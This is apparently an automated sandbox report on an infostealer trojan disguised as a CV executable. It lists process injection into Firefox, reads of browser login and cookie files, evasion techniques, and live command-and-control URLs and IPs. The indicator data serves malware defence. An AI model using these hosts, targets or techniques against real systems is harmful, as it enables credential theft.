            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152E284 mov eax, dword ptr fs:[00000030h]2_2_0152E284
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152E284 mov eax, dword ptr fs:[00000030h]2_2_0152E284
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015002A0 mov eax, dword ptr fs:[00000030h]2_2_015002A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015002A0 mov eax, dword ptr fs:[00000030h]2_2_015002A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov eax, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov ecx, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov eax, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov eax, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov eax, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015862A0 mov eax, dword ptr fs:[00000030h]2_2_015862A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F8550 mov eax, dword ptr fs:[00000030h]2_2_014F8550
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F8550 mov eax, dword ptr fs:[00000030h]2_2_014F8550
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152656A mov eax, dword ptr fs:[00000030h]2_2_0152656A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152656A mov eax, dword ptr fs:[00000030h]2_2_0152656A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152656A mov eax, dword ptr fs:[00000030h]2_2_0152656A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586500 mov eax, dword ptr fs:[00000030h]2_2_01586500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4500 mov eax, dword ptr fs:[00000030h]2_2_015C4500
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500535 mov eax, dword ptr fs:[00000030h]2_2_01500535
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]2_2_0151E53E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]2_2_0151E53E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]2_2_0151E53E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]2_2_0151E53E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]2_2_0151E53E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A5D0 mov eax, dword ptr fs:[00000030h]2_2_0152A5D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A5D0 mov eax, dword ptr fs:[00000030h]2_2_0152A5D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152E5CF mov eax, dword ptr fs:[00000030h]2_2_0152E5CF
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152E5CF mov eax, dword ptr fs:[00000030h]2_2_0152E5CF
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F65D0 mov eax, dword ptr fs:[00000030h]2_2_014F65D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F25E0 mov eax, dword ptr fs:[00000030h]2_2_014F25E0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]2_2_01500BBE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]2_2_01500BBE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]2_2_01500A5B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]2_2_01500A5B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]2_2_0156CA72
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]2_2_0156CA72
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159EA60 mov eax, dword ptr fs:[00000030h]2_2_0159EA60
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157CA11 mov eax, dword ptr fs:[00000030h]2_2_0157CA11
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]2_2_01514A35
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]2_2_01514A35
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA38 mov eax, dword ptr fs:[00000030h]2_2_0152CA38
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA24 mov eax, dword ptr fs:[00000030h]2_2_0152CA24
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151EA2E mov eax, dword ptr fs:[00000030h]2_2_0151EA2E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]2_2_01524AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]2_2_01524AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0AD0 mov eax, dword ptr fs:[00000030h]2_2_014F0AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]2_2_0152AAEE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]2_2_0152AAEE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01528A90 mov edx, dword ptr fs:[00000030h]2_2_01528A90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]2_2_014FEA80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]2_2_014FEA80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                NtWriteVirtualMemory: Direct from: 0x77762E3C
                NtMapViewOfSection: Direct from: 0x77762D1C
                NtNotifyChangeKey: Direct from: 0x77763C2C
                NtCreateMutant: Direct from: 0x777635CC
                NtResumeThread: Direct from: 0x777636AC
                NtQuerySystemInformation: Direct from: 0x77762DFC
                NtAllocateVirtualMemory: Direct from: 0x77762BFC
                NtReadFile: Direct from: 0x77762ADC
                NtDelayExecution: Direct from: 0x77762DDC
                NtWriteVirtualMemory: Direct from: 0x7776490C
                NtQueryInformationProcess: Direct from: 0x77762C26
                NtResumeThread: Direct from: 0x77762FBC
                NtCreateUserProcess: Direct from: 0x7776371C
                NtSetInformationThread: Direct from: 0x777563F9
                NtOpenKeyEx: Direct from: 0x77763C9C
                NtSetInformationThread: Direct from: 0x77762B4C
                NtQueryAttributesFile: Direct from: 0x77762E6C
                NtClose: Direct from: 0x77762B6C
                NtReadVirtualMemory: Direct from: 0x77762E8C
                NtCreateKey: Direct from: 0x77762C6C
                NtQuerySystemInformation: Direct from: 0x777648CC
                NtAllocateVirtualMemory: Direct from: 0x777648EC
                NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                NtOpenSection: Direct from: 0x77762E0C
                NtDeviceIoControlFile: Direct from: 0x77762AEC
                NtQueryValueKey: Direct from: 0x77762BEC
                NtQueryInformationToken: Direct from: 0x77762CAC
                NtTerminateThread: Direct from: 0x77762FCC
                NtCreateFile: Direct from: 0x77762FEC
                NtOpenFile: Direct from: 0x77762DCC
                NtOpenKeyEx: Direct from: 0x77762B9C
                NtSetInformationProcess: Direct from: 0x77762C5C
                NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                Memory written: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe base: 400000 value starts with: 4D5A
                Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and write
                Section loaded: NULL target: C:\Windows\SysWOW64\TSTheme.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\TSTheme.exe
                Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: read write
                Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Thread register set: target process: 7720
                Thread APC queued: target process: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                Process created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"
            Source: C:\Windows\SysWOW64\TSTheme.exe
                Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: ?Program Manager
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                Queries volume information: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match
                File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                File source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\TSTheme.exe
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match
                File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                File source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 412 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            [Behavior graph: ID 1447923; Sample: Curriculum Vitae Catalina M...; Startdate: 27/05/2024; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label | Link
            Curriculum Vitae Catalina Munoz.exe | 63% | ReversingLabs | Win32.Trojan.Leonem |
            Curriculum Vitae Catalina Munoz.exe | 57% | Virustotal | | Browse
            Curriculum Vitae Catalina Munoz.exe | 100% | Avira | HEUR/AGEN.1323686 |
            Curriculum Vitae Catalina Munoz.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            duobao698.com | 5% | Virustotal | | Browse
            www.botcsllc.com | 0% | Virustotal | | Browse
            gett.hu | 5% | Virustotal | | Browse
            www.drdavidglassman.com | 0% | Virustotal | | Browse
            featuringnature.de | 0% | Virustotal | | Browse
            www.duobao698.com | 1% | Virustotal | | Browse
            emgeecontracting.shop | 1% | Virustotal | | Browse
            www.lets-goo.ru | 1% | Virustotal | | Browse
            www.emgeecontracting.shop | 0% | Virustotal | | Browse
            https://www.reg.ru/dedicated/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
            http://www.getmall.online/sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_h0%Avira URL Cloudsafe
            http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y100%Avira URL Cloudmalware
            https://twitter.com/hover0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.crxwdix.store/y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            http://www.botcsllc.com/xvcs/0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y100%Avira URL Cloudmalware
            http://www.kohfour.com/nsxv/1%VirustotalBrowse
            http://www.featuringnature.de/arkx/0%Avira URL Cloudsafe
            http://www.friendsfavorites.pet/faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            http://www.botcsllc.com/xvcs/0%VirustotalBrowse
            http://www.getmall.online/sdqf/0%Avira URL Cloudsafe
            http://www.kohfour.com/nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%VirustotalBrowse
            http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA0%Avira URL Cloudsafe
            http://www.featuringnature.de/arkx/0%VirustotalBrowse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
duobao698.com | 3.33.130.190 | true | false | | unknown
www.botcsllc.com | 216.40.34.41 | true | false | | unknown
www.uqdr.cn | 188.114.96.3 | true | false | | unknown
www.crxwdix.store | 124.156.151.111 | true | true | | unknown
www.theppelin.online | 194.58.112.174 | true | false | | unknown
www.getmall.online | 203.161.43.228 | true | false | | unknown
gett.hu | 193.201.190.93 | true | false | | unknown
www.kohfour.com | 216.40.34.41 | true | false | | unknown
www.drdavidglassman.com | 199.59.243.225 | true | false | | unknown
94950.bodis.com | 199.59.243.225 | true | false | | unknown
featuringnature.de | 3.33.130.190 | true | false | | unknown
www.shengniu.com | 152.32.189.143 | true | false | | unknown
www.kernelphysics.com | 45.64.187.212 | true | false | | unknown
www.lets-goo.ru | 104.21.81.245 | true | false | | unknown
emgeecontracting.shop | 69.57.162.24 | true | false | | unknown
www.duobao698.com | unknown | unknown | true | | unknown
www.gett.hu | unknown | unknown | true | | unknown
www.emgeecontracting.shop | unknown | unknown | true | | unknown
www.friendsfavorites.pet | unknown | unknown | true | | unknown
www.featuringnature.de | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
203.161.43.228 | www.getmall.online | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
104.21.81.245 | www.lets-goo.ru | United States | 13335 | CLOUDFLARENETUS | false
193.201.190.93 | gett.hu | United Kingdom | 25546 | BROOKLANDCOMP-ASGB | false
45.64.187.212 | www.kernelphysics.com | Thailand | 58955 | BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH | false
188.114.96.3 | www.uqdr.cn | European Union | 13335 | CLOUDFLARENETUS | false
152.32.189.143 | www.shengniu.com | Hong Kong | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
69.57.162.24 | emgeecontracting.shop | United States | 25653 | FORTRESSITXUS | false
194.58.112.174 | www.theppelin.online | Russian Federation | 197695 | AS-REGRU | false
124.156.151.111 | www.crxwdix.store | Singapore | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
3.33.130.190 | duobao698.com | United States | 8987 | AMAZONEXPANSIONGB | false
